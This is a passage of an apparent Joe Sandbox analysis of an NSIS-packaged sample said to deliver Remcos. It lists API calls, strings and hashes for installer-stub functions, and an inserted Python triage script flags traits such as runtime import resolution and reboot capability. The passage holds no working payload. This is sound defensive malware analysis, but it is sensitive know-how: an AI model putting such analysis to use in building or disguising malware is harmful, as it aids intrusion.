                                                                    • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                    • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                    • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                    • API String ID: 2435955865-239407132
                                                                    • Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                    • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                    • Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                    • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                    Control-flow Graph
                                                                    (rendered graph not reproduced; the page marks blocks as Executed or Not Executed) Function entry 406805, basic blocks numbered 587 to 652 covering 406805 to 406a96. Win32 calls on the graph: GetVersion (4068d3), GetSystemDirectoryW (406952), GetWindowsDirectoryW (406965), SHGetSpecialFolderLocation (406999), SHGetPathFromIDListW and CoTaskMemFree (4069b1), lstrcatW (4069df), lstrlenW (406a46); internal calls to 405ed3, 405f51, 406009, 406038 and a recursive call to 406805.
                                                                    APIs
                                                                    • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                    • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                    • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                    • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                    • API String ID: 3581403547-784952888
                                                                    • Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                    • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                    • Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                    • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

                                                                    Control-flow Graph
                                                                    (rendered graph not reproduced; the page marks blocks as Executed or Not Executed) Function entry 4074bb, basic blocks numbered 886 to 971 covering 407350 to 407cf6. Win32 calls on the graph: GlobalFree (4073c2, 40743a) and GlobalAlloc (4073cb, 407443); no other imports and no internal calls appear, which matches the empty API ID and String ID in the record below.
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                    • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                    • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                    • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                    • String ID:
                                                                    • API String ID: 310444273-0
                                                                    • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                    • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                    • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                    • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
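Two of the records above are the ones an analyst would pull out of this section first: the routine at 00403AD1 to 00403C40, whose strings (NSIS Error, NCRC, ~nsu.tmp, /D=, _?=, SeShutdownPrivilege) and calls (CreateDirectoryW, CopyFileW, ExitWindowsEx) identify the NSIS uninstaller relocation stub, and the GetModuleHandleA, LoadLibraryA, GetProcAddress triple at 0040630A that is the runtime import resolution the report's signature list refers to. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin output: it parses API-call lines and String ID lines in the format used on this page into a record per function and applies a few triage rules to that record. The sample input is constructed by copying lines from those two records; the ApiCall and FunctionRecord types, the rule names and the EWX_REBOOT constant (the documented ExitWindowsEx flag value 0x2) are this example's own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: lines copied from two function records of the
# report above (uninstaller relocation stub, and the import resolver).
SAMPLE_RELOCATE = r"""• CoUninitialize.COMBASE(?), ref: 00403AD1
• ExitProcess.KERNEL32 ref: 00403AF1
• lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
• CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
• CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
• GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
• ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
• String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
"""
SAMPLE_RESOLVER = """• GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
• LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
• GetProcAddress.KERNEL32(00000000), ref: 00406327
"""

# "• Api.MODULE(args), ref: ADDR", optionally prefixed by a subcall note;
# the argument list is optional (ExitProcess above has none).
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRINGS_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<body>.*)$")

EWX_REBOOT = 0x00000002  # ExitWindowsEx flag bit (winuser.h)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list          # 8-hex-digit slots as int, "?" as None, text as str
    ref: int
    subcall_of: Optional[int] = None


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

    def has(self, *names):
        present = {c.api for c in self.calls}
        return all(n in present for n in names)

    def first(self, name):
        return next((c for c in self.calls if c.api == name), None)


def parse_arg(tok):
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_record(text):
    """Turn one record's API and String ID lines into a FunctionRecord."""
    rec = FunctionRecord()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
            sub = int(m["sub"], 16) if m["sub"] else None
            rec.calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
            continue
        m = STRINGS_RE.match(line)
        if m:
            rec.strings.extend(s.strip() for s in m["body"].split("$") if s.strip())
    return rec


def triage(rec):
    """Apply triage rules; returns the set of rule names that fired."""
    tags = set()
    # Runtime import resolution: a loader call and GetProcAddress in one routine.
    if rec.has("GetProcAddress") and (rec.has("LoadLibraryA") or rec.has("LoadLibraryW")):
        tags.add("dynamic_api_resolution")
    # Reboot capability: ExitWindowsEx with EWX_REBOOT set, and the privilege
    # name that has to be enabled before the call can succeed.
    ewx = rec.first("ExitWindowsEx")
    if ewx and ewx.args and isinstance(ewx.args[0], int) and ewx.args[0] & EWX_REBOOT:
        tags.add("reboot_capable")
        if "SeShutdownPrivilege" in rec.strings:
            tags.add("adjusts_shutdown_privilege")
    # NSIS runtime strings: installer stub code, not the carried payload.
    if any(s in rec.strings for s in ("NSIS Error", "NCRC", "~nsu.tmp")):
        tags.add("nsis_runtime_stub")
    # Creates a directory and copies a file into it (staging pattern).
    if rec.has("CreateDirectoryW", "CopyFileW"):
        tags.add("stages_copy_in_new_dir")
    return tags


if __name__ == "__main__":
    for name, text in (("relocate", SAMPLE_RELOCATE), ("resolver", SAMPLE_RESOLVER)):
        print(name, sorted(triage(parse_record(text))))
```

The argument columns in these entries reproduce the stack slots at the call site rather than a decoded prototype, which is why GetCurrentProcess, which takes no parameters, shows five values; rules should therefore key only on the leading arguments of APIs whose prototypes are known, as the ExitWindowsEx check does. Tagging the NSIS runtime strings is as useful as the positive findings: with Remcos delivered inside an NSIS package, the stub's own functions (installer error handling, uninstaller relocation, shell-folder lookup) are boilerplate that should be deprioritised so that analysis time goes to the code the stub unpacks.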
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                    • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                    • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                    • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                    • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                    Control-flow Graph
                                                                    (rendered graph not reproduced; the page marks blocks as Executed or Not Executed) Function entry 405479, basic blocks numbered 56 to 158 covering 405479 to 405929. Win32 calls on the graph: SetWindowPos (4054a8), ShowWindow (4054c0, 4058c4, 40590d), DestroyWindow (4054e0, 40581e, 4058de), SetWindowLongW (4054ff), GetDlgItem (40551c, 4055de, 4056cb, 40586b), SendMessageW (40552f, 405654, 405766, 405796), IsWindowEnabled (40552f), SetClassLongW (4055de), KiUserCallbackDispatcher (405723, 4058de), EnableWindow (405723), GetSystemMenu and EnableMenuItem (405766), lstrlenW and SetWindowTextW (4057af), CreateDialogParamW (405838), GetWindowRect and ScreenToClient (40586b); internal calls to 40139d, 40141d, 403d18, 403d3f, 403d85, 403d98, 403daf, 403dca, 406009 and 406805.
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                    • ShowWindow.USER32(?), ref: 004054D2
                                                                    • DestroyWindow.USER32 ref: 004054E6
                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                    • GetDlgItem.USER32(?,?), ref: 00405523
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                    • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                    • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                    • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                    • EnableWindow.USER32(?,?), ref: 00405757
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                    • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                    • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                    • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                    • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                    • String ID: @rD
                                                                    • API String ID: 3282139019-3814967855
                                                                    • Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                    • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                    • Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                    • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                     Control-flow Graph (function at 004015A0; legend: Executed / Not Executed; rendered graph not reproduced)
                                                                    APIs
                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                    Strings
                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                    • Jump: %d, xrefs: 00401602
                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                    • BringToFront, xrefs: 004016BD
                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                    • detailprint: %s, xrefs: 00401679
                                                                    • Sleep(%d), xrefs: 0040169D
                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                    • Call: %d, xrefs: 0040165A
                                                                    • Rename: %s, xrefs: 004018F8
                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                    • API String ID: 2872004960-3619442763
                                                                    • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                    • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                    • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                    • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                     Control-flow Graph (function at 0040592C; legend: Executed / Not Executed; rendered graph not reproduced)
                                                                    APIs
                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                    • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                    • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                    • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                    • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                      • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                    • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                    • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                    • API String ID: 608394941-1650083594
